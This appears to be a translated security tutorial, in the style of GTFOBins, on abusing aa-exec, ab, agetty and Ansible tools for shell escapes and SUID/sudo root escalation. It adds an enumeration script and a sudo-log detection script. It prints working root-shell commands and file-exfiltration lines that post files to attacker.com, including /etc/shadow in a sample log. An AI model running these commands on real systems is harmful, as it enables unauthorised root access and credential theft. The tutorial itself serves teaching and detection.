Linux privilege escalation tools
Many Unix binaries can be abused to bypass local security restrictions on misconfigured systems. Used with care, they can break out of restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and perform other post-exploitation tasks.
aa-exec
aa-exec launches a program confined by a given AppArmor profile (or profile namespace). AppArmor is a Linux Security Module that restricts what a program may access on the file system and what operations it may perform, which hardens the system as a whole. Usage:
$ aa-exec
USAGE: aa-exec [OPTIONS] <prog> <args>
Confine <prog> with the specified PROFILE.
OPTIONS:
-p PROFILE, --profile=PROFILE PROFILE to confine <prog> with
-n NAMESPACE, --namespace=NAMESPACE NAMESPACE to confine <prog> in
-d, --debug show messages with debugging information
-i, --immediate change profile immediately instead of at exec
-v, --verbose show messages with stats
-h, --help display this help
shell
Spawns an interactive system shell, which can be used to break out of a restricted environment.
┌──(kali㉿kali)-[~]
└─$ aa-exec /bin/sh
$ whoami
kali
SUID
If the binary has the SUID bit set, it does not drop the elevated privileges and can be used to access the file system, and to escalate or maintain privileged access as a SUID backdoor. The first command below only creates a SUID copy in the current directory for demonstration; on a real target you look for an existing SUID copy instead. The -p flag to /bin/sh makes the shell keep its effective UID instead of dropping it.
sudo install -m =xs $(which aa-exec) .
$ ./aa-exec /bin/sh -p
# whoami
root
ab
ab is ApacheBench, the load-testing tool shipped with the Apache HTTP server. It fires many requests at a server to measure throughput and other performance figures. Because it is a full HTTP client, it can also be used to move files in and out of a host.
$ ab
ab: wrong number of arguments
Usage: ab [options] [http[s]://]hostname[:port]/path
Options are:
-n requests Number of requests to perform
-c concurrency Number of multiple requests to make at a time
-t timelimit Seconds to max. to spend on benchmarking
This implies -n 50000
-s timeout Seconds to max. wait for each response
Default is 30 seconds
-b windowsize Size of TCP send/receive buffer, in bytes
-B address Address to bind to when making outgoing connections
-p postfile File containing data to POST. Remember also to set -T
-u putfile File containing data to PUT. Remember also to set -T
-T content-type Content-type header to use for POST/PUT data, eg.
'application/x-www-form-urlencoded'
Default is 'text/plain'
-v verbosity How much troubleshooting info to print
-w Print out results in HTML tables
-i Use HEAD instead of GET
-x attributes String to insert as table attributes
-y attributes String to insert as tr attributes
-z attributes String to insert as td or th attributes
-C attribute Add cookie, eg. 'Apache=1234'. (repeatable)
-H attribute Add Arbitrary header line, eg. 'Accept-Encoding: gzip'
Inserted after all normal header lines. (repeatable)
-A attribute Add Basic WWW Authentication, the attributes
are a colon separated username and password.
-P attribute Add Basic Proxy Authentication, the attributes
are a colon separated username and password.
-X proxy:port Proxyserver and port number to use
-V Print version number and exit
-k Use HTTP KeepAlive feature
-d Do not show percentiles served table.
-S Do not show confidence estimators and warnings.
-q Do not show progress when doing more than 150 requests
-l Accept variable document length (use this for dynamic pages)
-g filename Output collected data to gnuplot format file.
-e filename Output CSV file with percentages served
-r Don't exit on socket receive errors.
-m method Method name
-h Display usage information (this message)
-I Disable TLS Server Name Indication (SNI) extension
-Z ciphersuite Specify SSL/TLS cipher suite (See openssl ciphers)
-f protocol Specify SSL/TLS protocol
(SSL2, TLS1, TLS1.1, TLS1.2, TLS1.3 or ALL)
-E certfile Specify optional client certificate chain and private key
File upload
A local file can be sent as the body of an HTTP POST request:
URL=http://attacker.com/
LFILE=file_to_send
ab -p $LFILE $URL
File download
A remote file can be fetched with an HTTP GET request. The response body is printed as part of the program's verbose output, but only up to a length limit, so this is practical for small files.
URL=http://attacker.com/file_to_download
ab -v2 $URL
SUID
sudo install -m =xs $(which ab) .
URL=http://attacker.com/
LFILE=file_to_send
./ab -p $LFILE $URL
sudo
URL=http://attacker.com/
LFILE=file_to_send
sudo ab -p $LFILE $URL
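The SUID and sudo sections above assume you already know which of these binaries are set-uid or allowed through sudo on the target. The following script is an added example, not part of the original article, that does that enumeration: it lists SUID/SGID files whose base name matches one of the tools covered in this part, and parses `sudo -l` output for rules granting those tools (or ALL). The ABUSABLE list is deliberately limited to this page's tools, and the `sudo -l` output shown in the usage comment is constructed.

```shell
#!/bin/sh
# Added example, not part of the original article: find copies of the tools
# covered in this part (aa-exec, ab, agetty, ansible-playbook, ansible-test)
# that are SUID/SGID or allowed through sudo. ABUSABLE is an assumption
# limited to this page; extend it with the rest of the GTFOBins list.

ABUSABLE="aa-exec ab agetty ansible-playbook ansible-test"

# is_abusable NAME -> exit status 0 when NAME is one of the tools above
is_abusable() {
    for n in $ABUSABLE; do
        [ "$1" = "$n" ] && return 0
    done
    return 1
}

# find_setid ROOT -> every SUID or SGID regular file under ROOT (same filesystem)
find_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# flag_setid ROOT -> only the setid files whose base name is abusable;
# this is the "is there a SUID copy of ab/aa-exec/... lying around" check
flag_setid() {
    find_setid "$1" | while IFS= read -r path; do
        if is_abusable "$(basename "$path")"; then
            printf '%s\n' "$path"
        fi
    done
}

# flag_sudo_rules  (reads `sudo -l` output on stdin) -> prints each command
# path that is ALL or one of the abusable tools, with or without NOPASSWD.
# Rule lines look like:  (root) NOPASSWD: /usr/bin/ab, /usr/sbin/agetty -a root tty
flag_sudo_rules() {
    while IFS= read -r line; do
        case "$line" in
            *"("*")"*) ;;          # only rule lines carry a "(runas)" prefix
            *) continue ;;
        esac
        # drop the "(runas)" prefix and any TAG: words (NOPASSWD:, SETENV:, ...)
        cmds=$(printf '%s\n' "$line" | sed 's/^[[:space:]]*([^)]*)[[:space:]]*//; s/^\([A-Z]*:[[:space:]]*\)*//')
        # commands are comma separated; the first word of each entry is the path
        printf '%s\n' "$cmds" | tr ',' '\n' | while read -r cmd _rest; do
            [ -n "$cmd" ] || continue
            if [ "$cmd" = ALL ] || is_abusable "$(basename "$cmd")"; then
                printf '%s\n' "$cmd"
            fi
        done
    done
}

# Live audit only when asked for, so the file can also be sourced for its functions:
#   AUDIT=1 sh audit_gtfobins.sh
if [ "${AUDIT:-0}" = 1 ]; then
    echo "== SUID/SGID copies of tools from this page =="
    flag_setid /
    echo "== sudo rules for this user =="
    sudo -n -l 2>/dev/null | flag_sudo_rules
fi
```

`sudo -n -l` fails silently when a password is required; run `sudo -l` by hand in that case and pipe the result into `flag_sudo_rules`. A hit for ALL means any command, so the whole GTFOBins list applies, not just the five tools here.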
agetty
agetty is one of the programs that manage text terminals on Linux. It is a variant of getty (short for "get tty") and opens a login session on a terminal device.
agetty listens on a terminal device (a serial line, the console, and so on) and presents a login prompt, letting the user type a username on a text interface. It then hands over to the login program (/bin/login by default), which checks the password and starts the user's interactive session. The -l option replaces that login program, which is what the abuse below relies on.
On Linux, agetty is typically used in the following situations:
1. Serial devices: providing a login prompt on serial terminals (for example devices attached over a serial port).
2. Console: starting a login session on the local console (the physical terminal), for example via keyboard and display.
SUID
-l /bin/sh swaps the login program for a shell, -o -p passes -p to that shell so it keeps the effective UID, -a root sets the autologin user so no credentials are asked for, and tty names the terminal to use. The setup line only creates a SUID copy for demonstration.
sudo install -m =xs $(which agetty) .
./agetty -o -p -l /bin/sh -a root tty
ansible-playbook
ansible-playbook is part of Ansible and runs playbooks. A playbook is a text file describing configuration, deployment and automation work as a series of instructions (tasks) that configure and manage remote systems. The ansible-playbook command executes those playbook files. Usage:
ansible-playbook
usage: ansible-playbook [-h] [--version] [-v] [--private-key PRIVATE_KEY_FILE] [-u REMOTE_USER] [-c CONNECTION] [-T TIMEOUT]
[--ssh-common-args SSH_COMMON_ARGS] [--sftp-extra-args SFTP_EXTRA_ARGS] [--scp-extra-args SCP_EXTRA_ARGS]
[--ssh-extra-args SSH_EXTRA_ARGS] [-k | --connection-password-file CONNECTION_PASSWORD_FILE] [--force-handlers] [--flush-cache]
[-b] [--become-method BECOME_METHOD] [--become-user BECOME_USER] [-K | --become-password-file BECOME_PASSWORD_FILE] [-t TAGS]
[--skip-tags SKIP_TAGS] [-C] [-D] [-i INVENTORY] [--list-hosts] [-l SUBSET] [-e EXTRA_VARS] [--vault-id VAULT_IDS]
[--ask-vault-password | --vault-password-file VAULT_PASSWORD_FILES] [-f FORKS] [-M MODULE_PATH] [--syntax-check] [--list-tasks]
[--list-tags] [--step] [--start-at-task START_AT_TASK]
playbook [playbook ...]
ansible-playbook: error: the following arguments are required: playbook
ansible-playbook -h
usage: ansible-playbook [-h] [--version] [-v] [--private-key PRIVATE_KEY_FILE] [-u REMOTE_USER] [-c CONNECTION] [-T TIMEOUT]
[--ssh-common-args SSH_COMMON_ARGS] [--sftp-extra-args SFTP_EXTRA_ARGS] [--scp-extra-args SCP_EXTRA_ARGS]
[--ssh-extra-args SSH_EXTRA_ARGS] [-k | --connection-password-file CONNECTION_PASSWORD_FILE] [--force-handlers] [--flush-cache]
[-b] [--become-method BECOME_METHOD] [--become-user BECOME_USER] [-K | --become-password-file BECOME_PASSWORD_FILE] [-t TAGS]
[--skip-tags SKIP_TAGS] [-C] [-D] [-i INVENTORY] [--list-hosts] [-l SUBSET] [-e EXTRA_VARS] [--vault-id VAULT_IDS]
[--ask-vault-password | --vault-password-file VAULT_PASSWORD_FILES] [-f FORKS] [-M MODULE_PATH] [--syntax-check] [--list-tasks]
[--list-tags] [--step] [--start-at-task START_AT_TASK]
playbook [playbook ...]
Runs Ansible playbooks, executing the defined tasks on the targeted hosts.
positional arguments:
playbook Playbook(s)
options:
--ask-vault-password, --ask-vault-pass
ask for vault password
--become-password-file BECOME_PASSWORD_FILE, --become-pass-file BECOME_PASSWORD_FILE
Become password file
--connection-password-file CONNECTION_PASSWORD_FILE, --conn-pass-file CONNECTION_PASSWORD_FILE
Connection password file
--flush-cache clear the fact cache for every host in inventory
--force-handlers run handlers even if a task fails
--list-hosts outputs a list of matching hosts; does not execute anything else
--list-tags list all available tags
--list-tasks list all tasks that would be executed
--skip-tags SKIP_TAGS
only run plays and tasks whose tags do not match these values
--start-at-task START_AT_TASK
start the playbook at the task matching this name
--step one-step-at-a-time: confirm each task before running
--syntax-check perform a syntax check on the playbook, but do not execute it
--vault-id VAULT_IDS the vault identity to use
--vault-password-file VAULT_PASSWORD_FILES, --vault-pass-file VAULT_PASSWORD_FILES
vault password file
--version show program's version number, config file location, configured module search path, module location, executable location and exit
-C, --check don't make any changes; instead, try to predict some of the changes that may occur
-D, --diff when changing (small) files and templates, show the differences in those files; works great with --check
-K, --ask-become-pass
ask for privilege escalation password
-M MODULE_PATH, --module-path MODULE_PATH
prepend colon-separated path(s) to module library (default={{ ANSIBLE_HOME ~
"/plugins/modules:/usr/share/ansible/plugins/modules" }})
-e EXTRA_VARS, --extra-vars EXTRA_VARS
set additional variables as key=value or YAML/JSON, if filename prepend with @
-f FORKS, --forks FORKS
specify number of parallel processes to use (default=5)
-h, --help show this help message and exit
-i INVENTORY, --inventory INVENTORY, --inventory-file INVENTORY
specify inventory host path or comma separated host list. --inventory-file is deprecated
-k, --ask-pass ask for connection password
-l SUBSET, --limit SUBSET
further limit selected hosts to an additional pattern
-t TAGS, --tags TAGS only run plays and tasks tagged with these values
-v, --verbose Causes Ansible to print more debug messages. Adding multiple -v will increase the verbosity, the builtin plugins currently
evaluate up to -vvvvvv. A reasonable level to start is -vvv, connection debugging might require -vvvv.
Connection Options:
control as whom and how to connect to hosts
--private-key PRIVATE_KEY_FILE, --key-file PRIVATE_KEY_FILE
use this file to authenticate the connection
--scp-extra-args SCP_EXTRA_ARGS
specify extra arguments to pass to scp only (e.g. -l)
--sftp-extra-args SFTP_EXTRA_ARGS
specify extra arguments to pass to sftp only (e.g. -f, -l)
--ssh-common-args SSH_COMMON_ARGS
specify common arguments to pass to sftp/scp/ssh (e.g. ProxyCommand)
--ssh-extra-args SSH_EXTRA_ARGS
specify extra arguments to pass to ssh only (e.g. -R)
-T TIMEOUT, --timeout TIMEOUT
override the connection timeout in seconds (default=10)
-c CONNECTION, --connection CONNECTION
connection type to use (default=smart)
-u REMOTE_USER, --user REMOTE_USER
connect as this user (default=None)
Privilege Escalation Options:
control how and which user you become as on target hosts
--become-method BECOME_METHOD
privilege escalation method to use (default=sudo), use `ansible-doc -t become -l` to list valid choices.
--become-user BECOME_USER
run operations as this user (default=root)
-b, --become run operations with become (does not imply password prompting)
Example: ansible-playbook playbook.yml
playbook.yml is the playbook to run. Playbooks are normally written in YAML and define a list of tasks, host groups and the operations to carry out.
A playbook can do almost anything: install software, change system settings, deploy applications. It describes the desired state of a system and lets Ansible bring the remote system into that state. When ansible-playbook itself runs as root (via SUID or sudo), every task in the playbook runs as root too, which is why a one-line playbook is enough to get a shell.
shell
TF=$(mktemp)
echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >$TF
ansible-playbook $TF
ansible-test
ansible-test is Ansible's command-line tool for running its test suites against modules, plugins and other components. Usage:
ansible-test
usage: ansible-test [-h] [--version] COMMAND ...
ansible-test: error: the following arguments are required: COMMAND
shell
ansible-test shell
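Every abuse in this part runs through a privileged binary, and when the path is sudo it leaves a `COMMAND=` line in the sudo log (auth.log or the journal). The script below is an added example, not part of the original article, that scans such lines for the patterns described above: aa-exec confining a shell, ab with a POST body or verbose response dump, agetty with -l pointing at something other than the login program, a playbook run from a temporary directory, and `ansible-test shell`. The log lines, host name and user in SAMPLE_LOG are constructed for the example.

```shell
#!/bin/sh
# Added example, not part of the original article: a detection pass for the
# abuses shown in this part, run over constructed sudo log lines (the format
# sudo writes to auth.log or the journal: "... COMMAND=<argv>"). Every log
# line and host name below is made up; nothing here is real telemetry.

SAMPLE_LOG='Mar  4 10:01:12 host sudo:     kali : TTY=pts/0 ; PWD=/home/kali ; USER=root ; COMMAND=/usr/bin/apt update
Mar  4 10:02:40 host sudo:     kali : TTY=pts/0 ; PWD=/home/kali ; USER=root ; COMMAND=/usr/bin/ab -p /etc/shadow http://attacker.com/
Mar  4 10:03:05 host sudo:     kali : TTY=pts/0 ; PWD=/home/kali ; USER=root ; COMMAND=/usr/bin/ab -n 100 -c 10 http://localhost/
Mar  4 10:04:19 host sudo:     kali : TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/usr/sbin/agetty -o -p -l /bin/sh -a root tty
Mar  4 10:05:33 host sudo:     kali : TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/ansible-playbook /tmp/tmp.Xk2a1B
Mar  4 10:06:01 host sudo:     kali : TTY=pts/1 ; PWD=/home/kali ; USER=root ; COMMAND=/usr/bin/aa-exec /bin/sh'

# extract_command LINE -> the argv after "COMMAND=", empty if the line has none
extract_command() {
    case "$1" in
        *COMMAND=*) printf '%s\n' "${1##*COMMAND=}" ;;
        *) printf '\n' ;;
    esac
}

# classify ARGV -> a finding tag for one of the patterns this page describes,
# or nothing when the command is an ordinary use of the tool
classify() {
    set -f                        # no globbing while splitting argv
    set -- $1                     # split on whitespace; sudo logs argv unquoted
    [ $# -gt 0 ] || return 0
    bin=$(basename "$1"); shift
    case "$bin" in
        aa-exec)
            # only interesting when the "confined" program is a shell
            for a in "$@"; do
                case "$a" in */sh|*/bash|*/dash|*/zsh|sh|bash|dash|zsh) echo aa-exec-shell; return 0 ;; esac
            done ;;
        ab)
            # -p/-u post a local file as the request body (upload);
            # -v2 and above print the response body (download)
            while [ $# -gt 0 ]; do
                case "$1" in
                    -p|-u) echo ab-upload; return 0 ;;
                    -v) [ "${2:-0}" -ge 2 ] 2>/dev/null && { echo ab-download; return 0; } ;;
                    -v[2-9]*) echo ab-download; return 0 ;;
                esac
                shift
            done ;;
        agetty)
            # -l replaces /bin/login; anything else means a shell is spawned as root
            while [ $# -gt 1 ]; do
                if [ "$1" = -l ] && [ "$2" != /bin/login ] && [ "$2" != /sbin/login ]; then
                    echo agetty-login-replaced; return 0
                fi
                shift
            done ;;
        ansible-playbook)
            # playbooks in temporary or world-writable locations
            for a in "$@"; do
                case "$a" in /tmp/*|/var/tmp/*|/dev/shm/*) echo ansible-playbook-tmp; return 0 ;; esac
            done ;;
        ansible-test)
            [ "${1:-}" = shell ] && echo ansible-test-shell ;;
    esac
    return 0
}

# scan  (log lines on stdin) -> "TAG argv" for each line matching a pattern
scan() {
    while IFS= read -r line; do
        cmd=$(extract_command "$line")
        [ -n "$cmd" ] || continue
        tag=$(classify "$cmd")
        if [ -n "$tag" ]; then
            printf '%s %s\n' "$tag" "$cmd"
        fi
    done
}

# Run against the constructed sample. For a real host, source this file and
# feed it the sudo log instead:  journalctl _COMM=sudo -o cat | scan
printf '%s\n' "$SAMPLE_LOG" | scan
```

The SUID path leaves no sudo record; for that case pair this with an audit rule on execve of the SUID copies found by the enumeration script earlier on the page, and treat any agetty whose parent is not init as suspect.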
Originally published on the WeChat public account 安全小白: Linux privilege escalation tools (Part 1)